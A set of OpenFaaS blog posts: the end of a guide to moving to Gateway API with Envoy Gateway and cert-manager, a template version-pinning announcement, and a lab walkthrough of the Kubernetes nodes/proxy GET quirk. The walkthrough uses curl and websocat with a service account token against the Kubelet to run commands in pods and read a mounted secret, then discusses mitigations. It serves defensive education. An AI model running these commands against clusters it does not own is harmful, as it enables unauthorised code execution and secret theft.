Since this post will be valid for quite some time, you can find alternative versions of the chart by running arkade get crane, then crane ls envoyproxy/gateway-helm. See also: arkade.

Wait for Envoy Gateway to become available:

kubectl wait --timeout=5m -n envoy-gateway-system \
  deployment/envoy-gateway --for=condition=Available

Create a GatewayClass so that Gateway resources can reference the Envoy Gateway controller, the usual name is eg short for Envoy Gateway.

apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: eg
spec:
  controllerName: gateway.envoyproxy.io/gatewayclass-controller

Verify that the GatewayClass is accepted:

kubectl get gatewayclass

NAME    CONTROLLER                                      ACCEPTED
eg      gateway.envoyproxy.io/gatewayclass-controller    True

Install cert-manager

cert-manager automates TLS certificate management in Kubernetes. It integrates with the Gateway API to automatically create certificates for Gateway listeners.

Install cert-manager with Gateway API support enabled:

helm upgrade --install cert-manager oci://quay.io/jetstack/charts/cert-manager \
  --namespace cert-manager \
  --create-namespace \
  --version v1.19.3 \
  --set crds.enabled=true \
  --set config.apiVersion="controller.config.cert-manager.io/v1alpha1" \
  --set config.kind="ControllerConfiguration" \
  --set config.enableGatewayAPI=true

You can run crane ls jetstack/cert-manager to see alternative versions.

Note: The Gateway API CRDs must be installed before cert-manager starts. If you installed them after cert-manager, restart the controller with: kubectl rollout restart deployment cert-manager -n cert-manager

Create a cert-manager Issuer

Create an Issuer in the openfaas namespace that uses Let’s Encrypt with an HTTP-01 challenge. cert-manager will use this Issuer to automatically obtain certificates for any Gateway listener that references it.

apiVersion: cert-manager.io/v1
kind: Issuer
metadata:
  name: letsencrypt-prod
  namespace: openfaas
spec:
  acme:
    server: https://acme-v02.api.letsencrypt.org/directory
    privateKeySecretRef:
      name: letsencrypt-prod-account-key
    solvers:
    - http01:
        gatewayHTTPRoute:
          parentRefs:
          - name: openfaas-gateway
            namespace: openfaas
            kind: Gateway

Notice that the solver uses a gatewayHTTPRoute instead of the ingress class used in a traditional Ingress-based setup. This tells cert-manager to create a temporary HTTPRoute attached to a Gateway to solve the ACME HTTP-01 challenge.

The parentRefs field points to the Gateway we’ll create in the next step, so cert-manager knows which Gateway to attach the challenge route to. The referenced Gateway must have a listener on port 80, since the HTTP-01 challenge requires Let’s Encrypt to reach a well-known URL over plain HTTP. In our setup, we will include this HTTP listener directly on the same Gateway that serves HTTPS traffic. Alternatively, the Issuer could reference a separate Gateway created specifically for solving HTTP-01 challenges, as long as that Gateway has a port 80 listener.

If you’re setting this up for the first time, consider using the staging issuer to avoid rate limits. Change the server URL to https://acme-staging-v02.api.letsencrypt.org/directory and the issuer name to letsencrypt-staging.

apiVersion: cert-manager.io/v1
kind: Issuer
metadata:
  name: letsencrypt-staging
  namespace: openfaas
spec:
  acme:
    server: https://acme-staging-v02.api.letsencrypt.org/directory
    privateKeySecretRef:
      name: letsencrypt-staging-account-key
    solvers:
    - http01:
        gatewayHTTPRoute:
          parentRefs:
          - name: openfaas-gateway
            namespace: openfaas
            kind: Gateway

Expose the OpenFaaS gateway with TLS

Create the Gateway object

The Gateway (API Gateway, not OpenFaaS Gateway) resource defines a LoadBalancer with listeners for your domains. When a Gateway is created, the referenced GatewayClass controller provisions or configures the underlying load balancing infrastructure. The gatewayClassName field is required and must reference an existing GatewayClass - in our case the eg GatewayClass we created earlier for Envoy Gateway.

Start with a single HTTPS listener for the OpenFaaS gateway:

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: openfaas-gateway
  namespace: openfaas
  annotations:
    cert-manager.io/issuer: letsencrypt-prod
spec:
  gatewayClassName: eg
  listeners:
  - name: http
    port: 80
    protocol: HTTP
    allowedRoutes:
      namespaces:
        from: Same
  - name: gateway
    hostname: "gw.example.com"
    port: 443
    protocol: HTTPS
    allowedRoutes:
      namespaces:
        from: Same
    tls:
      mode: Terminate
      certificateRefs:
      - name: openfaas-gateway-cert

The cert-manager.io/issuer annotation tells cert-manager to watch this Gateway and automatically create a Certificate resource for each HTTPS listener. The certificate will be stored in the Secret referenced by certificateRefs.

The first listener on port 80 is the HTTP listener referenced by the Issuer we created earlier to resolve HTTP-01 challenges.

The second listener serves HTTPS traffic for gw.example.com on port 443. The tls.mode: Terminate setting means TLS is terminated at the Gateway and traffic is forwarded to the backend as plain HTTP. The certificateRefs field references the Secret where cert-manager will store the issued certificate.

Create the DNS record

Find the external IP address assigned to the Gateway:

$ kubectl get gateway -n openfaas openfaas-gateway

NAME               CLASS   ADDRESS          PROGRAMMED
openfaas-gateway   eg      203.0.113.10     True

Create an A record (or CNAME if you see a hostname) in your DNS provider pointing gw.example.com to this address.

Verify the certificate

Check that cert-manager has issued the certificate. Note that it might take a while for DNS to propagate and the certificate to become ready.

$ kubectl get certificate -n openfaas

NAME                     READY   SECRET                   AGE
openfaas-gateway-cert    True    openfaas-gateway-cert    2m

If the certificate doesn’t show Ready as True, then you can check the logs of cert-manager’s controller, and also its various Custom Resources.

kubectl logs -n cert-manager deploy/cert-manager

Use either the get or describe verb for more information about the resources.

kubectl get certificaterequests -n openfaas
kubectl get issuers -n openfaas
kubectl get orders -n openfaas

Create the HTTPRoute

While the Gateway defines listeners and TLS termination, it is the HTTPRoute that binds hostnames and paths to backend services.

Create an HTTPRoute that routes traffic from the Gateway to the OpenFaaS gateway service:

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: openfaas-gateway
  namespace: openfaas
spec:
  parentRefs:
  - name: openfaas-gateway
  hostnames:
  - "gw.example.com"
  rules:
  - matches:
    - path:
        type: PathPrefix
        value: /
    timeouts:
      # Should match gateway.writeTimeout in the OpenFaaS Helm chart.
      # Envoy's default of 15s is too short for most functions.
      request: 10m
    backendRefs:
    - name: gateway
      port: 8080

The timeouts.request field sets the maximum duration for the gateway to respond to an HTTP request. This value should be set to match the gateway.writeTimeout configured in the OpenFaaS Helm chart. If omitted, Envoy Proxy uses a default of 15 seconds which will cause functions with longer execution times to time out at the proxy level. See the expanded timeouts guide for details on configuring all timeout values.

The parentRefs field defines which Gateway this route wants to be attached to, in this case the openfaas-gateway Gateway. The hostnames field filters requests by the Host header before rules are evaluated, ensuring only requests for gw.example.com are matched. The backendRefs field defines the backend service where matching requests are forwarded - in this case the OpenFaaS gateway service on port 8080.

Attempt to reach a function

Using kubectl we can deploy a function from the OpenFaaS store, and invoke it via curl.

faas-cli generate --from-store env | kubectl apply -f -

curl -i https://gw.example.com/function/env

Log in to OpenFaaS

Once the certificate is issued and DNS has propagated, you can log in and use it as you would normally through Ingress.

For instance, if you’re not using IAM for OpenFaaS, you can simply run:

export OPENFAAS_URL=https://gw.example.com

PASSWORD=$(kubectl get secret -n openfaas basic-auth \
  -o jsonpath="{.data.basic-auth-password}" | base64 --decode; echo)
echo -n $PASSWORD | faas-cli login --username admin --password-stdin

faas-cli list

Add the OpenFaaS dashboard

The OpenFaaS Dashboard is an essential add-on for OpenFaaS Standard and OpenFaaS for Enterprises.

This is where we start to see some of the differences between Gateway API and Ingress.

With Ingress, the Ingress Controller has one IP, and routes all traffic to hosts and paths defined on Ingress records.

With Gateway API, you have two things to update and maintain, and to keep in sync: both the Gateway and the HTTPRoute objects must include the desired hostname i.e. dashboard.example.com.

Add a listener to the Gateway

Add a second HTTPS listener for the dashboard domain to the existing Gateway:

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: openfaas-gateway
  namespace: openfaas
  annotations:
    cert-manager.io/issuer: letsencrypt-prod
spec:
  gatewayClassName: eg
  listeners:
  - name: http
    port: 80
    protocol: HTTP
    allowedRoutes:
      namespaces:
        from: Same
  - name: gateway
    hostname: "gw.example.com"
    port: 443
    protocol: HTTPS
    allowedRoutes:
      namespaces:
        from: Same
    tls:
      mode: Terminate
      certificateRefs:
      - name: openfaas-gateway-cert
  - name: dashboard
    hostname: "dashboard.example.com"
    port: 443
    protocol: HTTPS
    allowedRoutes:
      namespaces:
        from: Same
    tls:
      mode: Terminate
      certificateRefs:
      - name: openfaas-dashboard-cert

cert-manager will detect the new HTTPS listener and automatically create a second Certificate for the dashboard domain.

Create the DNS record for the dashboard

Create an A or CNAME record for dashboard.example.com pointing to the same external IP as the Gateway.

Verify both certificates are ready:

$ kubectl get certificate -n openfaas

NAME                      READY   SECRET                    AGE
openfaas-gateway-cert     True    openfaas-gateway-cert     10m
openfaas-dashboard-cert   True    openfaas-dashboard-cert   2m

Note that it might take a while for the DNS to propagate and the certificate to get ready.

Create the HTTPRoute for the dashboard

apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: openfaas-dashboard
  namespace: openfaas
spec:
  parentRefs:
  - name: openfaas-gateway
  hostnames:
  - "dashboard.example.com"
  rules:
  - matches:
    - path:
        type: PathPrefix
        value: /
    timeouts:
      # Should match gateway.writeTimeout in the OpenFaaS Helm chart.
      # Envoy's default of 15s is too short for most functions.
      request: 10m
    backendRefs:
    - name: dashboard
      port: 8080

You should now be able to access the dashboard at https://dashboard.example.com.

That concludes the walk-through

Final thoughts and next steps

If you’re not sure whether to try to hang onto Ingress with one of the Ingress Controllers that’s still being maintained like Traefik, or to migrate to the Gateway API right now. We’d strongly encourage you to pick a sensible default like Envoy Gateway, and Gateway API. It will require some initial setup to migrate, but once it’s in place, we don’t expect you to need to change it much.

In summary we covered:

The double whammy of Ingress being sidelined by the community as a “legacy” technology, and ingress-nginx being deprecated with a very short notice period.
A sensible default for implementing Gateway API with Envoy Gateway.
How to map Gateway API resources to the OpenFaaS gateway and dashboard, including TLS termination from Let’s Encrypt.

If taking on Gateway API feels like too much right now, do not be tempted to continue using ingress-nginx in its unmaintained state. It’s had severe security issues in the recent past like CVE-2025-1974 on March 24 2025. Instead, you can get the basic routing, load balancing and TLS termination from Traefik. We’ve updated our existing guide on Ingress to reflect this.

For questions, comments and suggestions, reach out to us via your existing support channels, or through the form on our Pricing page.

How should OpenFaaS users approach nodes/proxy RCE in Kubernetes?

2026-01-27T00:00:00+00:00

We spin up a temporary Kubernetes cluster to explore and address a newly surfaced security vulnerability in Kubernetes.

Security researcher Graham Helton recently disclosed an interesting Kubernetes RBAC behavior: nodes/proxy GET permissions allow command execution in any Pod. The Kubernetes Security Team closed this as “working as intended,” but it’s worth understanding the implications.

OpenFaaS is a popular serverless platform for running functions on Kubernetes, and is used by individual product teams, and for multi-tenant environments.

As a preamble, we should say that this is not specific to OpenFaaS, but should be well understood by any operator configuring OpenFaaS for production use.

In this post, we’ll:

Spin up a K3s cluster in a SlicerVM microVM and Firecracker. You could also use a public cloud VM like AWS EC2.
Install OpenFaaS Pro with clusterRole: true (which grants nodes/proxy GET)
Use the service account’s token to execute commands in any Pod by connecting directly to the Kubelet on port 10250.
Whilst unexpected, we’ll discuss why this isn’t the risk you might think it is.

The vulnerability in brief

This capability only becomes meaningful if a specific internal Kubernetes service account’s token becomes compromised and a user with sufficient privileges can reach the Kubelet API - conditions that should not exist in a well-run production cluster.

Briefly speaking, this vulnerability requires:

Possession of a Kubernetes service account token with nodes/proxy (GET) access
Network reachability to a node’s Kubelet server on port 10250

This is not a remote unauthenticated exploit, and it is not reachable via the OpenFaaS API. It requires an already-compromised Kubernetes service account token and network path to the Kubelet.

┌─────────────────────────────────────────────────────────────────────────┐
│                         The Attack Flow                                 │
└─────────────────────────────────────────────────────────────────────────┘

  ┌───────────────┐         ┌──────────────────┐         ┌──────────────┐
  │   Attacker    │         │   K8s API Server │         │    Kubelet   │
  │ (with token)  │         │                  │         │  (port 10250)│
  └───────┬───────┘         └────────┬─────────┘         └──────┬───────┘
          │                          │                          │
          │  1. GET nodes/proxy      │                          │
          │  ────────────────────►   │                          │
          │                          │                          │
          │  ✓ Authorized (GET)      │                          │
          │  ◄────────────────────   │                          │
          │                          │                          │
          │  2. WebSocket upgrade to Kubelet ──────────────────►│
          │     (still a GET!)                                  │
          │                          │                          │
          │  3. /exec/namespace/pod?command=id ────────────────►│
          │     (exec via WebSocket)                            │
          │                          │                          │
          │  ✓ Kubelet allows it     │                          │
          │  ◄──────────────────────────────────────────────────│
          │     (sees GET, not exec)                            │
          │                          │                          │
          ▼                          ▼                          ▼

  The Kubelet checks the HTTP method (GET) not the action (exec)
  ═══════════════════════════════════════════════════════════════

The Kubelet makes authorization decisions based on the HTTP method of the initial WebSocket handshake (GET), not the operation being performed (exec). Since WebSockets require an HTTP GET to establish the connection, a service account with only nodes/proxy GET can execute commands in any Pod by connecting directly to the Kubelet on port 10250.

According to Helton, his search found 69 affected publicly listed Helm charts including: Prometheus, Datadog, Grafana, and OpenFaaS when deployed with clusterRole: true. The common theme with each of these, is that they gather key metrics and log data from individual nodes in order to provide value to the end user - monitoring, or in the case of OpenFaaS, both monitoring and autoscaling.

A note on alerts from CVE scanners in general

We often get emails to our support inbox from customers who are concerned about automated vulnerability reports where a CVE is found in a base image or the Go runtime. That’s normal, and having a defined process for fixes and turn-around is important for any vendor that deals with risk-sensitive enterprise customers. Typically, the CVE in question will be a false positive - yes it is present, however it is not exercised in any way in the codebase. We’ll sometimes nudge customers to run govulncheck against the binary to see that for themselves.

That doesn’t mean we ignore CVEs that concern customers, we’re very responsive, however, we also don’t want them to be distracted about false positives.

Tutorial

Our lab setup

We’ll use SlicerVM to spin up a temporary Kubernetes cluster in a Firecracker microVM. You could also use a public Kubernetes service or your VM provider of choice.

This is what it’ll look like, pretty much everything is fully installed and setup, including the login step for faas-cli and configuring kubectl.

 Host                        Firecracker microVM
  │                                  │
  │  slicer up k3s-rce.yaml          │
  │─────────────────────────────────►│
  │                                  │
  │  .secrets/LICENSE ──(VSOCK)─────►│ /run/slicer/secrets/
  │                                  │
  │                                  │  userdata.sh starts
  │                                  │        │
  │                                  │        ▼
  │                                  │  ┌──────────┐
  │                                  │  │  arkade  │ get kubectl, helm,
  │                                  │  └────┬─────┘ faas-cli, k3sup...
  │                                  │       │
  │                                  │       ▼
  │                                  │  ┌──────────┐
  │                                  │  │  k3sup   │ install K3s
  │                                  │  └────┬─────┘
  │                                  │       │
  │                                  │       ▼
  │                                  │  ┌──────────┐
  │                                  │  │   helm   │ install OpenFaaS Pro
  │                                  │  └────┬─────┘ (clusterRole=true)
  │                                  │       │
  │                                  │       ▼
  │                                  │  Ready! K3s + OpenFaaS
  │                                  │
  │  slicer vm shell ───────────────►│  ubuntu@k3s-rce-1:~$
  │                                  │

SlicerVM is a tool we’ve used internally since around 2022 for building out Kubernetes clusters on bare-metal, on our own hardware. Sometimes, that’s a mini PC in the office, and at other times, it’s a larger, public-facing bare-metal server from a vendor like Hetzner. It gets around a few prickly issues with cloud-based K8s like: excessive cost, slow setup, and a very limited number of Pods per machine.

In late 2025, we released it for general consumption, with an additional mode to launch disposable VMs for automation and coding agents and have been building up an engaged community of users on our Discord server.

The point is: from the moment a customer support request comes in, we can have a full installation of OpenFaaS and K3s within less than a minute. This is a key part of our customer support process - rapid responses, fast iterating on new features, with higher performance for lower cost than public cloud.

Leave 1-2 clusters running on AWS EKS for some research? You may find your manager breathing down your neck about a mysterious 2000 USD AWS bill.

We don’t have that problem. We’ll show you a quick way to spin up OpenFaaS with K3s in a microVM, like we’d do for a customer support request.

SlicerVM can also run autoscaling Kubernetes nodes, and can run HA across a number of VMs or physical hosts. You can find out more in the Kubernetes section of the docs.

Step 1: Set up the secrets

On a machine with Linux installed, and KVM available (bare-metal or nested virtualization), install Slicer.

You can use a commercial seat, or your Home Edition license.

Create a working directory for the lab.

mkdir -p k3s-rce
cd k3s-rce

Create a .secrets/ folder with your OpenFaaS license. Slicer’s secret store syncs files securely into the VM via its guest agent over VSOCK—no need to expose secrets in userdata.

sudo mkdir -p .secrets
sudo chmod 700 .secrets

# Copy from your existing license location
sudo cp ~/.openfaas/LICENSE .secrets/LICENSE

Step 2: Create the userdata script

Create userdata.sh to bootstrap K3s and OpenFaaS Pro:

#!/bin/bash
set -ex

export HOME=/home/ubuntu
export USER=ubuntu
cd /home/ubuntu/

(
arkade update
arkade get kubectl helm faas-cli k3sup stern jq websocat --path /usr/local/bin
chown $USER /usr/local/bin/*
mkdir -p .kube
)

(
k3sup install --local --k3s-extra-args '--disable traefik'
mv ./kubeconfig ./.kube/config
chown $USER .kube/config
)

export KUBECONFIG=/home/ubuntu/.kube/config

# Block until ready
k3sup ready --kubeconfig $KUBECONFIG

(
kubectl apply -f https://raw.githubusercontent.com/openfaas/faas-netes/master/namespaces.yml

kubectl create secret generic \
  -n openfaas \
  openfaas-license \
  --from-file=license=/run/slicer/secrets/LICENSE

helm repo add openfaas https://openfaas.github.io/faas-netes/
helm repo update

helm upgrade --install openfaas openfaas/openfaas \
  --namespace openfaas \
  -f https://raw.githubusercontent.com/openfaas/faas-netes/refs/heads/master/chart/openfaas/values-pro.yaml \
  --set clusterRole=true

PASSWORD=$(kubectl get secret -n openfaas basic-auth -o jsonpath="{.data.basic-auth-password}" | base64 --decode)
echo "$PASSWORD" > /home/ubuntu/.openfaas-password

chown -R $USER $HOME
echo "export OPENFAAS_URL=http://127.0.0.1:31112" >> $HOME/.bashrc
echo "export KUBECONFIG=/home/ubuntu/.kube/config" >> $HOME/.bashrc
echo "cat /home/ubuntu/.openfaas-password | faas-cli login --password-stdin" >> $HOME/.bashrc
)

Step 3: Generate the VM config

slicer new k3s-rce \
  --graceful-shutdown=false \
  --net=isolated \
  --allow=0.0.0.0/0 \
  --cpu=2 \
  --ram=4 \
  --userdata-file ./userdata.sh \
  > k3s-rce.yaml

Feel free to explore the YAML file to see what’s going on, you can edit it, or add additional settings via slicer new --help.

Step 4: Start the VM

We tend to run Slicer in a tmux window, so we can detach and reconnect later.

tmux new -s slicer

sudo -E slicer up ./k3s-rce.yaml

On the first run, the base VM image will be downloaded and unpacked. It can take a few seconds to a minute or so, then new VM launches will be almost instant.

Then once booted, the userdata to set up K3s and wait for its readiness could also take a minute or two.

The following command will block until userdata has fully completed.

sudo -E slicer vm ready --userdata

Step 5: Shell into the VM

sudo -E slicer vm shell --uid 1000

# Or give the VM name explicitly
sudo -E slicer vm shell --uid 1000 k3s-rce-1

Once inside, verify OpenFaaS is running:

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.10.240 x86_64)
ubuntu@k3s-rce-1:~$

kubectl get pods -n openfaas

Step 6: Extract the prometheus service account token

The OpenFaaS prometheus deployment uses a service account with nodes/proxy GET for scraping metrics:

TOKEN=$(kubectl create token openfaas-prometheus -n openfaas --duration=1h)
echo $TOKEN

You’ll be presented with a JWT, you can copy and paste this into https://jwt.io to look into the claims if you wish. It’s a standard JWT, so you can use any JWT decoder to view the claims.

{
  "aud": [
    "https://kubernetes.default.svc.cluster.local",
    "k3s"
  ],
  "exp": 1769517043,
  "iat": 1769513443,
  "iss": "https://kubernetes.default.svc.cluster.local",
  "jti": "6f6c4370-ecda-4661-8ed0-803b6dc4ea64",
  "kubernetes.io": {
    "namespace": "openfaas",
    "serviceaccount": {
      "name": "openfaas-prometheus",
      "uid": "593cba9a-8dd7-488b-96c0-d44bd5a6d703"
    }
  },
  "nbf": 1769513443,
  "sub": "system:serviceaccount:openfaas:openfaas-prometheus"
}

Verify the permissions:

kubectl auth can-i --list --as=system:serviceaccount:openfaas:openfaas-prometheus | grep nodes

Resources      Non-Resource URLs     Resource Names   Verbs
nodes/proxy    []                    []               [get list watch]
nodes          []                    []               [get list watch]

The key permission here is nodes/proxy GET.

Step 7: Discover the node IP and pods

NODE_IP=$(kubectl get nodes -o jsonpath='{.items[0].status.addresses[?(@.type=="InternalIP")].address}')
echo "Node IP: $NODE_IP"

echo "Pods:"
curl -sk -H "Authorization: Bearer $TOKEN" \
  "https://$NODE_IP:10250/pods" | jq -r '.items[] | "\(.metadata.namespace)/\(.metadata.name)"' | head -10

Example output:

Node IP: 172.16.0.2

Pods:
kube-system/metrics-server-7b9c9c4b9c-79tn9
openfaas/autoscaler-5c9677bb4d-pxklm
openfaas/queue-worker-586c6c964b-fzvj9
openfaas/queue-worker-586c6c964b-lq6tf
openfaas/gateway-5596cbd757-f9kws
openfaas/prometheus-d9665fc79-vczwd
kube-system/coredns-7f496c8d7d-j6dsn
kube-system/local-path-provisioner-578895bd58-zhl9q
openfaas/nats-5cfd5b5bc8-mphfb
openfaas/queue-worker-586c6c964b-mvl9f

Step 8: Execute commands via WebSocket

Here’s the exploit. Despite only having nodes/proxy GET, we can exec into any pod.

Find a gateway pod, and then use the token to exec into it:

POD=$(kubectl get pods -n openfaas -l app=gateway -o jsonpath='{.items[0].metadata.name}')

websocat --insecure \
  --header "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
  "wss://$NODE_IP:10250/exec/openfaas/$POD/operator?output=1&error=1&command=id"

Output:

uid=100(app) gid=65533(nogroup) groups=65533(nogroup)
{"metadata":{},"status":"Success"}

Now let’s create a secret for a function, deploy the function, then use the exec approach to obtain the contents of the secret.

This is a toy function that simply echos its hostname, it doesn’t consume the secret, but it is mounted into the function.

faas-cli secret create api-key --from-literal=secret-key

faas-cli deploy --name fn1 \
  --image ghcr.io/openfaas/alpine:latest \
  --secret api-key \
  --env fprocess="cat /etc/hostname"

# Try out the function

faas-cli invoke fn1 <<< ""
fn1-dff95b7d8-zdncl

Now, get the Pod name for the function as before:

POD=$(kubectl get pods -n openfaas-fn -l faas_function=fn1 -o jsonpath='{.items[0].metadata.name}')
echo "Function Pod: $POD"

Next, use websocat to exec into the function pod, and list, then obtain secrets at the standard mount path: /var/openfaas/secrets:

The example given by Helton only runs a single command without arguments, we need to extend it to specify a target file or directory by repeating &command= for each additional argument.

websocat --insecure \
  --header "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
  "wss://$NODE_IP:10250/exec/openfaas-fn/$POD/fn1?output=1&error=1&command=ls&command=/var/openfaas/secrets"

Output:

total 8
-rw-r--r-- 1 root root 4096 Jan 27 12:00 api-key
{"metadata":{},"status":"Success"}

Now, obtain the secret contents:

websocat --insecure \
  --header "Authorization: Bearer $TOKEN" \
  --protocol v4.channel.k8s.io \
  "wss://$NODE_IP:10250/exec/openfaas-fn/$POD/fn1?output=1&error=1&command=cat&command=/var/openfaas/secrets/api-key"

The output shows the contents of the secret:

secret-key
{"metadata":{},"status":"Success"}

So, we’ve successfully executed commands in a Pod, and obtained the contents of a secret.

What might not be as obvious, is that the same node/proxy GET permission can be used to fetch container logs. In an ideal world, functions should not be logging sensitive data to stdout/stderr, however some teams may even consider the name of a function to be confidential information.

ubuntu@k3s-rce-1:~$ curl -sk \
  -H "Authorization: Bearer $TOKEN" \
  "https://$NODE_IP:10250/containerLogs/openfaas-fn/$POD/fn1?tailLines=100×tamps=true"

2026-01-27T11:42:58.759721814Z 2026/01/27 11:42:58 Version: 0.3.3	SHA: bf545828573185cd03ebc60254ba3d01d6bbcc5b
2026-01-27T11:42:58.760982598Z 2026/01/27 11:42:58 Timeouts: read: 30s write: 30s hard: 0s health: 30s.
2026-01-27T11:42:58.760992609Z 2026/01/27 11:42:58 Listening on port: 8080
2026-01-27T11:42:58.760995637Z 2026/01/27 11:42:58 Writing lock-file to: /tmp/.lock
2026-01-27T11:42:58.760997950Z 2026/01/27 11:42:58 Metrics listening on port: 8081
2026-01-27T11:43:01.643064545Z 2026/01/27 11:43:01 Forking fprocess.
2026-01-27T11:43:01.643729053Z 2026/01/27 11:43:01 Wrote 20 Bytes - Duration: 0.000705s
2026-01-27T12:48:13.897806818Z 2026/01/27 12:48:13 Forking fprocess.
2026-01-27T12:48:13.898409344Z 2026/01/27 12:48:13 Wrote 20 Bytes - Duration: 0.000573s
2026-01-27T12:48:15.076840450Z 2026/01/27 12:48:15 Forking fprocess.
2026-01-27T12:48:15.077518996Z 2026/01/27 12:48:15 Wrote 20 Bytes - Duration: 0.000736s

What we’ve learned from this exercise

This isn’t as scary as it sounds

The dramatic headline of the disclosure makes this look catastrophic. In practice, a properly configured OpenFaaS deployment, and best practices for kubectl access neutralise the risk.

1. OpenFaaS for Enterprises has its own IAM system

No OpenFaaS IAM role grants access to Kubernetes service account tokens. Users interact via the OpenFaaS API/CLI, not via kubectl. The Prometheus service account is internal infrastructure, and is not accessible to users.

If you’re running OpenFaaS Standard, the same holds, however instead of using fine-grained IAM and user accounts, you’re likely using a single user account for administration. But that account is within OpenFaaS, not within Kubernetes.

We believe that end-users, who write, deploy and support functions can perform their duties without the need for kubectl access. The faas-cli, OpenFaaS Dashboard, and CLI/REST API provide all functionality required for users to manage their functions, and monitor their usage. Enterprise users can also enable auditing for the API.

Ideally, only trusted staff within the DevOps or infrastructure teams should have kubectl access, aligned with best practices of least privilege and short-lived credentials.

2. Users should never have kubectl access in production

The ideal deployment pattern:

Environment	Access Model
Local dev on your own machine	Direct `kubectl` access to your own machine is fine, use non-production credentials
Staging/shared clusters	Grant only limited `kubectl` access, do not grant access to the `openfaas` namespace
Production	Time-limited `kubectl` access to SRE/DevOps team only

Typically, companies that are SOC2 or ISO 27001 compliant implement two roles. Development and deployment/operations. Development teams should not generally have access to the production cluster, but deploy via decoupled CI/CD pipelines or GitOps tools.

3. The service account requires network access to the Kubelet

You need to reach port 10250 on a node. In most production setups, this is firewalled or only accessible from within the cluster.

4. Metrics require this permission

The nodes/proxy GET permission exists because Prometheus (and similar tools) need to scrape /metrics and /stats endpoints from Kubelets. It’s required for the value proposition of monitoring. 67+ other cloud-native projects have the same requirement. OpenFaaS uses this data for monitoring, and for autoscaling on RAM/CPU usage.

What you should do

Don’t grant users kubectl access in production - deployments should happen solely through GitOps tools or a CI/CD pipeline. Users should only have read-only “openfaas” IAM-based access via the OpenFaaS Dashboard, and no kubectl access of any form
Network-segment the Kubelet API - ensure port 10250 isn’t reachable from user workloads
Use OpenFaaS IAM - it provides function-level RBAC without exposing Kubernetes primitives
Monitor for direct Kubelet access - depending on your audit policy, you may see associated authorization checks (e.g. SubjectAccessReview events), even if the exec stream isn’t logged.

Wrapping up

This is a real quirk in Kubernetes RBAC—the fact that GET vs CREATE authorization depends on the transport protocol is surprising. Calling it “RCE” overstates the practical risk for well-architected deployments of OpenFaaS:

The affected service account is internal infrastructure
Properly configured OpenFaaS users should never be able to interact with it directly
Production is where real secrets are defined, and should use GitOps/CI deployments, not manual kubectl access

We realise that you may have much more than OpenFaaS installed in your cluster, so now is the time to carefully review your security policies, and user access.

If you have any questions or concerns, get in touch with us directly via our support inbox.

Introducing Template Version Pinning for Functions

2025-11-19T00:00:00+00:00

As of version 0.18.0 of the faas-cli, you can now pin templates to a specific version via the stack.yaml file for more reproducible builds and to avoid unexpected changes.

Why pin a template?

Pinning a version of a template, just like any other dependency can shield your functions from unexpected changes, and make it easier to test variations before rolling them out more broadly.

A template such as golang-middleware may change for any number of reasons, whether that’s the underlying Go version, the HTTP server that’s hidden from users, or even the base image used for runtime.

You may also be experimenting and change a template called python3-http from using an Alpine Linux base to using Debian. All your older functions that may rely on specific apk packages can remain on an older version of the template, until you’re ready to upgrade. Newer functions can use a newer version.

You may also need to enable certain logging or debug options, but don’t want to impact your existing functions. Creating a new named branch would mean you could switch out one or more functions to use that new version.

How does it work?

You can pin a template in three ways:

lang: golang-middleware@1.0.0 - a release tag
lang: golang-middleware@inproc - a branch name
lang: golang-middleware@sha-af599e - a specific commit hash prefixed with sha- with a short or long SHA format

When specifying a release tag or branch name, an efficient shallow clone can be performed, however if you specify a SHA, a full clone of the repository is required to checkout that specific commit. A full clone could impact the performance of CI/CD pipelines if the repository is large or has a long history.

Finally, if you do not pin a version, then the latest version will be fetched from git whenever it is not available in the local ./template folder.

Note: if you have added the @ character into any of your custom template names, that will no longer be supported. So if you had written node@22, that should ideally be renamed to node22 or node-22 or similar.

Whenever templates are expanded, a new meta.json file is written into each template’s folder. This file will make its way into the build of any function, so that you can understand which template and version was used to build a function image once it’s already been published.

For golang-middleware@sha-2e6e262, the following was written out:

{
  "repository": "https://github.com/openfaas/golang-http-template",
  "ref_name": "sha-2e6e262",
  "sha": "2e6e262a724fc07d4eac75612c98a8870acf5606",
  "written_at": "2025-11-13T18:20:02.109733766Z"
}

How do I fetch pinned templates?

The first way, is to create a new template and specify the version in the new command:

faas-cli new --lang golang-middleware@1.0.0 my-function

This will create a new function in the current directory, and use the golang-middleware template at version 1.0.0.

For existing functions, you can use the above @ syntax and update the existing YAML:

functions:
  my-function:
-   lang: golang-middleware
+   lang: golang-middleware@1.0.0

A note on the default templates repository

There is a so called default templates repository that is used whenever you run faas-cli template pull without specifying a repository or language. We don’t think this makes much sense going forward, since both the Go and Python templates are now in different repositories.

If you want to explore the available templates, use the store commands instead:

faas-cli template store list

So should you start pinning template versions now?

As a general rule of thumb, pinning versions of all assets you use from Docker base images, to npm packages, to Go modules, to Python packages, to any other dependency you use in your functions, setting a stable and known version of a template is an industry standard practice.

It’s not required, just as a Dockerfile can use a :latest tag, templates can be used without any version suffix. Without pinning, you’ll always get the latest version of the template including any fixes and updates to the base image, which will keep your CVE scanner happy. But at the same time, if an unexpected change breaks assumptions made by your functions, it could cause unexpected issues down the line.

To find the release of any template in the store, find its Git repository and visit the Releases page, find the latest release or SHA in the HEAD branch, and update your stack.yaml file to use that version.

For instance: faas-cli template store describe python3-http will show you the URL for the repository, where you can find the latest Release tag, or if there hasn’t been a release for a while, the latest SHA in the default branch (usually master).

Wrapping up

Whilst this may look like a simple change, it affects a large number of code paths, and whilst we have strived to minimise impact, there may be some edge cases that we have missed. If your CI pipeline breaks for any reason, you can pin the release binary of faas-cli to the last version before this feature was introduced: 0.17.8.

The majority of the work has been carried out via the following pull request and tested by the full time team.

For those of us that do start pinning our templates, we must also remember to update them over time, to the latest Release as it becomes available, or to the latest SHA available in the default branch.

For questions, comments, and suggestions reach out via your support channel of choice whether that’s Slack, the Customer Community on GitHub, or Email.

Optimise OpenFaaS costs on AWS

2025-09-17T00:00:00+00:00

